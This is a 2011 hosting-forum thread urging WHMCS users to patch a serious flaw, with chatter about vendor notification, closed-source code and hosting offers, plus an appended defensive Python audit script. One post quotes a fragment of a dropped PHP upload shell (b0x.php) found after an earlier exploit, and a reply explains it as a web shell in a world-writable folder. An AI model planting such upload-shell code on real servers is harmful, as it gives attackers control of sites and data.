Providers, please update your WHMCS - severe security risk.

cripperz Member
edited December 2011 in General

Hi guys,

WHMCS got hit again. It causes me not to be able to recover my admin password, and the password was changed unexpectedly.

Please refer to WHMCS forum - http://forum.whmcs.com/showthread.php?p=206522

Do update your WHMCS quickly as this is a serious threat.

Comments

  • Thank you, I've just updated my test WHMCS =)

  • rm_ IPv6 Advocate, Veteran
    edited December 2011

    Heh, turns out sometimes it's beneficial to use providers with their own custom control panel. :)

  • @rm_ said: Heh, turns out sometimes it's beneficial to use providers with their own custom control panel. :)

    What did you mean mate? I think WHMCS is a billing system, not control panel?

  • At one time, I created a huge hosting control panel using CakePHP Framework, but I replaced it with WHMCS because it was AWESOME :)

  • I don't trust WHMCS or any other software that hides the code. Could have anything hidden in there. Fortunately though, I have some software that removes ionCube

  • Infinity Member, Host Rep

    True, but can't you decode it? The people that null the scripts must be able to do so.

  • @DanielM said: Fortunately though, I have some software that removes ionCube

    Would you please share it? :P

  • Thank you for pointing this out as it seems our hosting/license provider failed to mention it :)

  • Rens Member
    edited December 2011

    Every WHMCS client should have received a mailing about it. This issue seems to be known for a while, there were already people exploiting this in October. Worries me.

  • Yep, every direct WHMCS client does, it's down to our provider who issues our WHMCS license (MDD Hosting) to tell us, which they have not.. still.

  • @VMPort said: our hosting/license provider failed to mention it

    Subscribe to the WHMCS twitter feed.

  • @miTgib

    You get my point though, right? I shouldn't have to? If a host is providing the license/software they should be informing customers of potential security threats.

    Or am I expecting too much :P

  • They should, but it's your responsibility to keep on top of things too. Relying on someone else is adding one unnecessary point of failure to things.

  • Sure it is, that's why I have done it myself :P I also popped a ticket into MDD telling them I think it would be a good idea to let clients know. Cos I'm nice :)

  • @Asim said: but I replaced it with WHMCS because it WAS awesome :)

    Fixed :)

    Actually we don't use whmcs so I wouldn't know.

    @VMPort said: You get my point though, right? I shouldn't have to? If a host is providing the license/software they should be informing customers of potential security threats.

    Or am I expecting too much :P

    Nope. You just explained my entire line of work. :)

    I do wonder about the October bit up there. I know some of the scripts that we use, once a problem is made public, sometimes someone will pop out of the woodwork and announce that "Wait, I let you know about that months ago!" and point to a ticket or forum posting or something else.

    That's what concerns me. Seen it with Gallery, wordpress, firefox, windows, etc....

  • Ash_Hawkridge Member
    edited December 2011

    Just for reading's sake... Their response.

    We are aware, and was going to announce it but we discovered a huge issue with the patch that broke our WHMCS and we have a pending ticket with WHMCS about it. Once they resolve the issue we'll announce the patch.

    Thank you,

    Michael Denney
    MDDHosting - Professional Hosting
    http://www.mddhosting.com/
    Follow us on Twitter! http://twitter.com/MDDHosting

  • @drmike said: Actually we don't use whmcs

    Please don't say you use Platypus still

  • Abacus

  • @VMPort said: Just for reading's sake... Their response.

    We are aware, and was going to announce it but we discovered a huge issue with the patch that broke our WHMCS and we have a pending ticket with WHMCS about it. Once they resolve the issue we'll announce the patch.

    Thank you,

    Michael Denney

    MDDHosting - Professional Hosting
    http://www.mddhosting.com/
    Follow us on Twitter! http://twitter.com/MDDHosting

    From their twitter
    MDDHosting Forums: [Critical] WHMCS Security Update Affecting All Versions http://bit.ly/sycoEx

  • @DanielM
    That's basically like running nulled software. You don't trust a company that many produces software that many million dollar companies use on a day to day basis.

    Your post is just stupid.

  • @EaseVPS said: That's basically like running nulled software. You don't trust a company that many produces software that many million dollar companies use on a day to day basis.

    Your post is just stupid.

    Just like Apple tracking their users with secret software, and billions of users...

  • @giang
    That's understandable if they do. They reserve the right to keep their software out of the eyes of the world. If I had spent billions of dollars developing an operating system and a range of mini portable device(s), I would not want my software to be very easy to decode.

    Every company that develops software should have some callback lines in the code.

  • Francisco Top Host, Host Rep, Veteran

    That's not from this bug, but rather one related to templates/etc back in October.

    Francisco

  • It seems somewhat harmless but I don't see what it's trying to do:

    $fo = fopen("downloads/b0x.php","w");
    fwrite($fo,$code);
    echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!'; } else { echo 'Upload GAGAL !!!'; } } ?>
    

    I'm guessing the form was to upload config files to somewhere listed in downloads/b0x.php?

  • Francisco Top Host, Host Rep, Veteran

    The code would run on the server side, so since /downloads/ is normally 777, the b0x script, likely a phpshell, would dump in there.

    Francisco
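
An added example (not part of the thread and not WHMCS code): a small audit that flags world-writable directories and PHP files under an upload directory such as the downloads/ folder discussed above. The extension list and marker strings are assumptions drawn from the snippet quoted in the thread, and the sample tree is constructed.

```python
import os
import stat
import tempfile

# Extensions a PHP handler mapping may execute (assumption; match your server config).
PHP_EXTS = (".php", ".phtml", ".php5", ".phar")
# PHP open tag plus strings that appear in the snippet quoted in the thread.
MARKERS = (b"<?php", b"$_FILES", b"$_POST['_upl']")


def audit_upload_dir(root):
    """Return (world_writable_dirs, suspicious_files) for a directory tree."""
    writable, suspicious = [], []
    for dirpath, _dirs, files in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:  # the "777" case
            writable.append(dirpath)
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = ["php-extension"] if name.lower().endswith(PHP_EXTS) else []
            try:
                with open(path, "rb") as fh:
                    head = fh.read(65536)
            except OSError:
                head = b""
            reasons += ["contains " + m.decode() for m in MARKERS if m in head]
            if reasons:
                suspicious.append((path, reasons))
    return writable, suspicious


def build_sample_tree():
    """Constructed sample: a 0777 downloads/ dir with one benign and one dropped file."""
    downloads = os.path.join(tempfile.mkdtemp(), "downloads")
    os.mkdir(downloads)
    os.chmod(downloads, 0o777)
    with open(os.path.join(downloads, "manual.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 constructed sample")
    with open(os.path.join(downloads, "b0x.php"), "wb") as fh:
        fh.write(b"<?php // constructed sample\n$_POST['_upl']; $_FILES;")
    return downloads


if __name__ == "__main__":
    dirs, files = audit_upload_dir(build_sample_tree())
    print("world-writable:", dirs)
    for path, why in files:
        print("suspicious:", path, why)
```

A download area that only serves static files should contain no hits at all, so any result is worth a look.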

  • Francisco Top Host, Host Rep, Veteran

    @DotVPS said: How do i fix it? its whmcs 5?

    I'm guessing WHMCS 5 should have had it included, but I could be wrong.

    Worth logging a ticket with Matt and see what's up. The latest exploit just allows dumping of file contents. If you're on shared hosting this could be a serious problem, but I'd hope you have your billing on a VPS of sorts?

    Francisco

  • Francisco Top Host, Host Rep, Veteran

    You should get a 256MB KVM from us if anything. If you use lighttpd instead of apache you should have no issues keeping up with even huge rushes.

    Francisco

  • Infinity Member, Host Rep
    edited December 2011

    AFAIK. Stock is coming next year, so about a month or maybe more :P.

  • Francisco Top Host, Host Rep, Veteran

    @Infinity said: AFAIK. Stock is coming next year, so about a month or maybe more :P.

    We'll have some in a week or so depending on how the .32 trials finish off. We just pushed pony7.2 to 99 so we'll see how it goes.

    The kernels have been good without any real issues even under serious load.

    Francisco
